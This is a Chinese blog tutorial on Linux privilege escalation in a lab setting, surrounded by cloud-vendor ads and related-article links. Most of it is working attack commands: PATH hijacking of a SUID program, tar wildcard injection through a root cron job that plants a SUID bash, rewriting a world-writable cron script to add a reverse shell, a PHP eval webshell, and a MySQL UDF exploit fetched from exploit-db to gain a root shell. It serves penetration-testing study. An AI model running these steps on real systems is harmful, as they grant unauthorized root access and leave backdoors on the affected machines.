【权限提升】Linux系统&环境变量&定时任务&权限配置不当&MDUT自动化

本文涉及的产品
云数据库 RDS MySQL,集群系列 2核4GB
推荐场景:
搭建个人博客
RDS MySQL Serverless 基础系列,0.5-2RCU 50GB
云数据库 RDS MySQL,高可用系列 2核4GB
简介: 【权限提升】Linux系统&环境变量&定时任务&权限配置不当&MDUT自动化

Linux-环境变量文件配合SUID-本地

条件:ROOT用户对某个第三方程序(管理员自己写的运维脚本等)给予了SUID权限

探针:find / -user root -perm -4000 -print 2>/dev/null 探测除系统命令外管理员添加的具有suid权限的文件


root用户讲可执行文件进行编译,保证文件的正常授权运行,给予ROOT权限执行

domo.c

#include<unistd.h>
void main()
{ setuid(0);
  setgid(0);
  system("ps");  #system权限执行ps命令
}

ps自带的环境变量 路径:

[fragile@localhost tmp]# whereis ps
ps: /usr/bin/ps /usr/share/man/man1/ps.1.gz /usr/share/man/man1p/ps.1p.gz

编译demo文件重命名为shell(给到了suid权限),赋予执行权限 执行后运行ps命令

gcc demo.c -o shell
chmod u+s shell


chmod命令+s参数解释如下:

s 在文件执行时把进程的属主或组ID置为该文件的文件属主。

原来只有某用户可以执行httpd这条命令, u+s后其他用户都可享有文件属主的权限。通过chown将文件属主调整为root,这样其他用户即可以root权限操作该文件。


普通用户通过对文件反编译或源代码查看,覆盖其执行环境变量,直接让其执行指定程序获取权限

cp /bin/bash /104/ps
export PATH=/104:$PATH
./shell
id


解释

原ps命令查看当前进程 环境变量为/usr/bin/ps

环境变量加入104 执行ps相当于执行/104/ps

将/bin/bash复制为 /104/ps 相当于现在的/104/ps是bash命令

shell执行 system权限执行ps命令 相当于suid执行bash就是直接提权

实战应用

  1. 普通用户权限下先获取suid所有程序
  2. 去除系统自带的一些命令(筛选第三方程序)
  3. 对该程序进行反编译或者找源码 明白该程序的作用
  4. 思考该程序有无执行一些环境变量命令 (ps ping su sudo 等 比如该shell程序执行了ps命令)
  5. 尝试通过复制suid提权命令 复制替换原来的执行命令 (先添加环境变量 优先执行复制后的命令)
  6. 注:当前目录优先级高于环境变量


Linux-定时任务打包配合SUID-本地

背景:运维为了防止数据丢失等,写一个定时任务进行数据的打包压缩

数据打包命令可以尝试添加参数调用其他命令执行

tar zxf 1.tar.gz /var/www/*


提权通过获取计划任务执行文件信息进行提权

相对路径和绝对路径执行

计划任务命令存在参数调用


利用计划任务的备份功能tar命令的参数利用

定时任务crontab配置文件:

backup.sh

cd /tmp/;tar czf /tmp/backup.tar.gz *  #压缩当前目录所有文件至/tmp/backup.tar.gz
[root@localhost tmp]# cat /etc/crontab #定义每分钟执行一次脚本
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
* * * * * root /tmp/backup.sh
# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed

image.png


Linux-定时任务配合tar操作-suid提权基础

这里解压后不是明显的/tmp目录下文件的原因是,边压缩文件的同时该目录下文件也在变化,不应该备份到当前目录下

echo "" > "--checkpoint-action=exec=sh test.sh"   #将空文件写入--checkpoint-action=exec=sh test.sh中
echo "" > --checkpoint=1
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > test.sh   #写入命令  chmod +s对可执行文件升级权限 赋予suid权限
chmod +x test.sh

image.png

Linux-定时任务打包配合SUID提权

tar --checkpoint=1   #调用其他命令执行


https://pentestlab.blog/2017/09/25/suid-executables/ 允许suid提权至root权限 系统命令查询


解释

定时任务执行/tmp/backup.sh

cd /tmp/;tar czf /tmp/backup.tar.gz *

tar czf /tmp/backup.tar.gz --checkpoint-action=exec=sh test.sh

tar czf /tmp/backup.tar.gz --checkpoint=1

定时任务进行文件压缩的时候利用tar命令进行命令执行 与文件名进行拼接 从而间接执行test.sh文件

执行当前目录的bash程序 借助suid进行bash提权

由于定时任务是root用户下发的,所以执行中是root权限

实战应用

查看定时任务· 定时任务有没有可利用 (tar打包压缩等)


可能会出现的错误:您在 /var/spool/mail/root 中有新邮件

将backup.sh 权限设置为可执行就可以了

注:一般适用于本地用户提权 webshell权限可能看不了压缩后的目录文件

部分操作是需要管理员权限,因为是模拟管理员开启的定时任务。


Linux-定时任务文件权限配置不当-WEB&本地

Linux 下的每个文件都有以下三种权限

r:表示读取,对应的数字为 4

w:表示写入,对应的数字为 2

x:表示执行,对应的数字为 1

通过 4、2、1 的组合,进行权限分配

利用不安全的权限分配操作导致的定时文件覆盖

chmod 777 775 等 所有者 组 其他成员说明

什么意思呢?就是管理员或运维人员在使用定时任务进行bash脚本时,提前会赋予脚本执行权限

比如chmod +x xxx.sh chmod 555 xxx.sh 这些都是正常的,但是有些管理员可能会由于粗心直接设置chmod 777 xxx.sh 此时普通用户也具有w权限,即具有写入权限,拿到普通用户权限之后可以直接修改xxx.sh,比如在脚本中添加反弹shell命令,从而利用定时任务执行反弹shell(执行为root权限)。

fe783b8a071a8218db675aba7d06c9c9_dc5a62445d204b7580548b9b4bad2bd0.png

Linux-第三方软件MYSQL数据库提权-WEB&本地

MDUT 2.0 数据库利用工具 github地址见文章底部(有最新工具版本) V2.1.1版本百度云链接


这里我们只做mysql提权利用

利用phpmailer进行修改并反弹

python D:/Myproject/40974.py

nc -lvvp 4444

#写入后门利用菜刀连接方便操作

echo '<?php eval($_POST[x]);?>' >1.php


上传信息收集脚本进行提权信息收集

./LinEnum.sh 注意配置执行权限 具体使用方法见我的上一篇博客

翻阅数据库配置文件获取root密码:

数据库只允许本地连接 使用哥斯拉连接

设置root用户可以外联

外部连接数据库还是失败,可能原因是靶机防火墙进行设置不允许其他外部主机连接数据库

思路:

手工提权(在webshell上面的数据库管理进行提权) 自己连自己

隧道出网(用外部或本机的工具项目提权 建立隧道)

1、无法外联走隧道-MDUT自动化数据库提权

GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'R@v3nSecurity' WITH GRANT OPTION;


隧道出网演示:

使用天蝎进行内网穿透

MDUT连接 直接一键提权 navicat可以尝试

整体过程演示

image.png

使用MDUT对raven-2 靶机MySQLUDF自动化提权

2、利用Mysql提权 searchsploit-手工提权

下载mysql udf kali poc进行编译

wget https://www.exploit-db.com/download/1518
mv 1518 raptor_udf.c
gcc -g -c raptor_udf.c
gcc -g -shared -o raptor_udf.so raptor_udf.o -lc
mv raptor_udf.so 1518.so

上传或下载1518到目标服务器

wget https://xx.xx.xx.xx/1518.so


进入数据库进行UDF导出

use mysql;
create table foo(line blob);
insert into foo values(load_file('/tmp/1518.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';

创建do_system函数调用

create function do_system returns integer soname '1518.so';
select do_system('chmod u+s /usr/bin/find');

探测可以利用的suid文件

#配合使用find调用执行

touch whgojp
find whgojp –exec "whoami" \;
find whgojp –exec "/bin/sh" \;
id
相关实践学习
如何快速连接云数据库RDS MySQL
本场景介绍如何通过阿里云数据管理服务DMS快速连接云数据库RDS MySQL,然后进行数据表的CRUD操作。
全面了解阿里云能为你做什么
阿里云在全球各地部署高效节能的绿色数据中心,利用清洁计算为万物互联的新世界提供源源不断的能源动力,目前开服的区域包括中国(华北、华东、华南、香港)、新加坡、美国(美东、美西)、欧洲、中东、澳大利亚、日本。目前阿里云的产品涵盖弹性计算、数据库、存储与CDN、分析与搜索、云通信、网络、管理与监控、应用服务、互联网中间件、移动服务、视频服务等。通过本课程,来了解阿里云能够为你的业务带来哪些帮助 &nbsp; &nbsp; 相关的阿里云产品:云服务器ECS 云服务器 ECS(Elastic Compute Service)是一种弹性可伸缩的计算服务,助您降低 IT 成本,提升运维效率,使您更专注于核心业务创新。产品详情: https://www.aliyun.com/product/ecs
相关文章
|
4天前
|
人工智能 自然语言处理 数据挖掘
企业数字化转型的关键:如何利用OA系统实现自动化与智能决策
在数字化时代,传统办公系统已无法满足现代企业的需求。通过将RPA(机器人流程自动化)和AI(人工智能)技术与OA系统结合,企业能实现业务流程自动化、智能决策支持,大幅提升工作效率和资源配置优化,推动数字化转型。RPA可自动处理重复任务,如审批、数据同步等;AI则提供智能数据分析、预测和决策支持,两者协同作用,助力财务管理、人力资源管理、项目管理和客户服务等多个领域实现智能化升级。未来,智能化OA系统将进一步提升个性化服务、数据安全和协作能力,成为企业发展的关键驱动力。
|
1月前
|
存储 缓存 监控
Linux缓存管理:如何安全地清理系统缓存
在Linux系统中,内存管理至关重要。本文详细介绍了如何安全地清理系统缓存,特别是通过使用`/proc/sys/vm/drop_caches`接口。内容包括清理缓存的原因、步骤、注意事项和最佳实践,帮助你在必要时优化系统性能。
193 78
|
4天前
|
缓存 安全 Linux
Linux系统查看操作系统版本信息、CPU信息、模块信息
在Linux系统中,常用命令可帮助用户查看操作系统版本、CPU信息和模块信息
48 23
|
10天前
|
Shell Linux
Linux-环境变量
通过合理设置和管理环境变量,可以显著提高工作效率和系统管理能力。理解并掌握这些基本操作,是每个Linux用户和管理员的必备技能。
33 13
|
1月前
|
Linux Shell 网络安全
Kali Linux系统Metasploit框架利用 HTA 文件进行渗透测试实验
本指南介绍如何利用 HTA 文件和 Metasploit 框架进行渗透测试。通过创建反向 shell、生成 HTA 文件、设置 HTTP 服务器和发送文件,最终实现对目标系统的控制。适用于教育目的,需合法授权。
73 9
Kali Linux系统Metasploit框架利用 HTA 文件进行渗透测试实验
|
1月前
|
存储 监控 Linux
嵌入式Linux系统编程 — 5.3 times、clock函数获取进程时间
在嵌入式Linux系统编程中,`times`和 `clock`函数是获取进程时间的两个重要工具。`times`函数提供了更详细的进程和子进程时间信息,而 `clock`函数则提供了更简单的处理器时间获取方法。根据具体需求选择合适的函数,可以更有效地进行性能分析和资源管理。通过本文的介绍,希望能帮助您更好地理解和使用这两个函数,提高嵌入式系统编程的效率和效果。
105 13
|
1月前
|
人工智能 自然语言处理 JavaScript
Agent-E:基于 AutoGen 代理框架构建的 AI 浏览器自动化系统
Agent-E 是一个基于 AutoGen 代理框架构建的智能自动化系统,专注于浏览器内的自动化操作。它能够执行多种复杂任务,如填写表单、搜索和排序电商产品、定位网页内容等,从而提高在线效率,减少重复劳动。本文将详细介绍 Agent-E 的功能、技术原理以及如何运行该系统。
113 5
Agent-E:基于 AutoGen 代理框架构建的 AI 浏览器自动化系统
|
2月前
|
Ubuntu Linux 网络安全
linux系统ubuntu中在命令行中打开图形界面的文件夹
在Ubuntu系统中,通过命令行打开图形界面的文件夹是一个高效且实用的操作。无论是使用Nautilus、Dolphin还是Thunar,都可以根据具体桌面环境选择合适的文件管理器。通过上述命令和方法,可以简化日常工作,提高效率。同时,解决权限问题和图形界面问题也能确保操作的顺利进行。掌握这些技巧,可以使Linux操作更加便捷和灵活。
65 3
|
1月前
|
Ubuntu Linux C++
Win10系统上直接使用linux子系统教程(仅需五步!超简单,快速上手)
本文介绍了如何在Windows 10上安装并使用Linux子系统。首先,通过应用商店安装Windows Terminal和Linux系统(如Ubuntu)。接着,在控制面板中启用“适用于Linux的Windows子系统”并重启电脑。最后,在Windows Terminal中选择安装的Linux系统即可开始使用。文中还提供了注意事项和进一步配置的链接。
47 0
|
2月前
|
Linux
在 Linux 系统中,`find` 命令
在 Linux 系统中,`find` 命令
48 1